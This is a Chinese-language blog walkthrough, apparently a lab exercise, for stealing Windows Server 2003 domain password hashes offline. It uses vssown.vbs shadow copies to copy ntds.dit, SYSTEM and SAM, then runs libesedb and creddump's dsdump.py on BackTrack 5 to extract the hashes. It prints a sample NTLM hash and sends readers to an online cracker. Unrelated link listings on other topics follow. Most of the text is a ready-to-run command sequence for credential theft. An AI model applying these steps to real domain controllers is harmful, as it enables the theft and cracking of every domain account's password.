国内网站讲了许多方法,很多也讲得不清楚。我把我尝试成功的经验跟大家分享。

方法是按照tim的文章操作,链接如下:

http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html


实验环境:windows server2003,域环境

搭建方法很简单,百度搜搜。

新建一个域用户xiaocai,密码设为 123abcABC

二 win2003下提取文件

1、将vssown.vbs拷到域服务器上,比如拷到域服务器的桌面。

2、以管理员身份运行cmd,执行以下命名:

cd 桌面

cscript //nologo vssown.vbs /start 启用

cscript //nologo vssown.vbs /status 查看运行状态

cscript //nologo vssown.vbs /create C 创建快照

cscript //nologo vssown.vbs /list 查看创建的快照信息

这里可以看到系统内部的路径,将两个ntds.dit和SYSTEM文件复制到桌面,这里的[X]用5代替。

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM

提取就文件就结束了,这里我尝试的时候经常失败。有空我再找找资料分析一下到底是什么造成。

再把快照删除(这步可选,建议删除掉)

cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}

把这3个生成的文件复制出来。


提取HASH

先下载工具,BT5,我是用下面这个虚拟机镜相

VMWARE镜像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

登陆密码:
root/toor

开放ssh服务:(开启服务后可以用Secure CRT进行访问,方便传文件)

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

sshd-generate

/etc/init.d/ssh restart

略掉一个截图

用ifconfig查看IP

接着用Secure CRT访问,

按ALT+P 开启SFTP,把文件传到/tmp下

cd /tmp

put SYSTEM ntds.dit ntds_dump_hash.zip

切换到BT5系统标签

cd /tmp

ls

#解压 ntds_dump_hash.zip

unzip ntds_dump_hash.zip

#编译libesedb

cd libesedb

chmod +x configure

./configure && make

#解释数据文件ntds.dit

cd esedbtools

./esedbdumphash ../../ntds.dit

#提取hash

cd ../../creddump/

python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

提取出来了,找到,

xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::


破解hash

破解hash方法很多,这里采用网站破解。把加粗的那部分放到网站上去破解:http://www.objectif-securite.ch/en/ophcrack.php

补充:之前有碰到域数据库文件ntds.dit不是存放在默认的c:\windows\ntds\下,比如存放在e:\ntds\下

这时情如果按上面的方法提取,会提示"系统找不到指定路径。

这里建议创建2个快照,一个创建在C盘,一个创建在E盘(ntds.dit所以的盘)。

cscript //nologo vssown.vbs /create C 创建快照,为了提取system

cscript //nologo vssown.vbs /create E 创建快照,为了提取ntds.dit

用对应的方法把这2个文件copy出来。

快照8是 C盘的

快照7是 E盘的

这样就可以顺利地复制出2个文件

这里多注意ntds.dit的路径;system还是默认的路径

这里还要补充一些知识,虽然不够全面,但是也告诉我们一些域服务器的重要信息。我是从下面的url了解到。

http://blogs.technet.com/b/csstwplatform/archive/2008/10/09/ad-ntds-dit.aspx

从上面我们可以看域数据库在注册表中的重要参数,ntds.dit存放的位置是可以修改。这些参数知道对前面的路径的理解有很大的帮助。

成功提取system和ntds.dit两个文件后,按前面第三步起的方法再破解。

这里再秀一下hash,xiaocai是在默认路径下时建立的账号;mimei是把域数据库移动到E:\ntds\后建立的账号。

离线破win2003域账号密码(更新域数据库不在默认路径的情况)的更多相关文章

  1. git ssh https 踩坑记 ---- 域账号密码更新

    前几天突然通知要更新公司的域账号密码,然后git pull就一直报 fatal: Authentication failed for 'https://git ... 很奇怪的是,有一个项目git p ...

  2. Nodejs通过账号密码连接MongoDB数据库

    转自https://blog.csdn.net/szu_lzz/article/details/77435804#commentBox 1.创建管理员 首先开启Mongo服务,然后切换admin数据库 ...

  3. 已知服务器ftp的账号密码,求解数据库表的内容

    一开始觉得这两个是完全不相干的东西,直到出现了这样一个问题,对方网站只有ftp的账号密码,并且能正常访问到代码.但是当需求了解注册人数的时候,后台没有显示,只能到数据库去找,这时怎么找呢? 原来是可以 ...

  4. weblogic启动受管服务器报错Authentication for user weblogic denied (weblogic 11g 域账号密码不生效的解决方法)

    或者   解决方法:

  5. .Net C#域账号登陆验证

    //获取登陆页输入的域账号.密码 string domainIP = ""; //域IP string userAccount = ""; //域账号 stri ...

  6. devilbox(三):在docker中启动带密码的redis数据库

    背景概述: 之前是使用docker搭建了一套集成的开发环境devilbox,也说了这个环境可以自定义.其实搭建这个环境一是为了练习docker使用,二是搭建我们测试环境,主要用到各种数据库,然而安装教 ...

  7. 使用java连接AD域,验证账号密码是否正确

    eb项目中有时候客户要求我们使用ad域进行身份确认,不再另外做一套用户管理系统.其实客户就是只要一套账号可以访问所有的OA,CRM等办公系统.这就是第三方验证.一般有AD域,Ldap,Radius,邮 ...

  8. SharePoint基于windows验证的如何通过组策略实现IE自动以当前域账号登录SP站点

    通过组策略实现IE自动以当前域账号登录SP站点 1. 在运行中运行MMC,启动"组策略对象编辑器". 如下图: 找到组策略如下图: 找到域 点右键编辑 找到如下图: 找到[计算机配 ...

  9. 通过组策略实现Firefox自动以当前域账号登录MOSS站点---(原创)

    忘忧草原创,转发请保留本人的大名,谢谢,如果需要文档的请找我索取 前言 通过组策略实现基于AD的windows验证的sharepoint站点在火狐下自动以当前域账号登录. 操作步骤-在服务器添加策略工 ...

随机推荐

  1. Java---练习:文件切割与合并(1)

    实现对大文件的切割与合并. 按指定个数切(如把一个文件切成10份)或按指定大小切(如每份最大不超过10M),这两种方式都可以. 示例程序说明: 文件切割:把一个文件切割成多个碎片,每个碎片的大小不超过 ...

  2. HDOJ(HDU) 1898 Sempr == The Best Problem Solver?(水题、、、)

    Problem Description As is known to all, Sempr(Liangjing Wang) had solved more than 1400 problems on ...

  3. HDU4757--Tree 可持久化trie + LCA

    题意:n个点的树,Q次询问,询问u-v路径上的点的权值与z抑或的最大值. 先考虑,在一个区间上的问题,可以先建一个可持久化的Trie,然后每次询问,就和线段树的操作差不多,从最高位开始考虑选1还是选0 ...

  4. label标签的属性

    //label标签的属性 - (void)viewDidLoad { //初始化一个label1标签对象,初始化有很多方法,最原始的就是init,此处用带有frame的方法 UILabel *labe ...

  5. otl获得sql出错位置(oracle)

    项目的一个需要,要获得sql出错的位置,从而给出类似sqlplus的错误提示(如下) sql出错原因易获得,记录在otl_exception::msg,但出错位置就不是那么容易了. 默认情况下otl异 ...

  6. cmake编译错误:“No CMAKE_C_COMPILER could be found”的原因

    发生此错误,原因在于,进行configure命令时,没有选择正确的编译器,比如电脑上安装的是VS2012,想编译位64位,选择了VS2012 X64,这样就会报错了,选择VS2012就对了,一样可以编 ...

  7. 2016 cocoapods的安装和使用以及版本升级遇到的问题

    一.CocoaPods是什么? CocoaPods是一个负责管理iOS项目中第三方开源库的工具.CocoaPods的项目源码在Github上管理.该项目开始于2011年8月12日,在这两年多的时间里, ...

  8. jenkins服务器安装

    http://www.360doc.com/content/13/0412/09/10504424_277718090.shtml

  9. 学习之路十四:客户端调用WCF服务的几种方法小议

    最近项目中接触了一点WCF的知识,也就是怎么调用WCF服务,上网查了一些资料,很快就搞出来,可是不符合头的要求,主要有以下几个方面: ①WCF的地址会变动,地址虽变,但是里面的逻辑不变! ②不要引用W ...

  10. POJ 2001 Shortest Prefixes(字典树)

    题目地址:POJ 2001 考察的字典树,利用的是建树时将每个点仅仅要走过就累加.最后从根节点開始遍历,当遍历到仅仅有1次走过的时候,就说明这个地方是最短的独立前缀.然后记录下长度,输出就可以. 代码 ...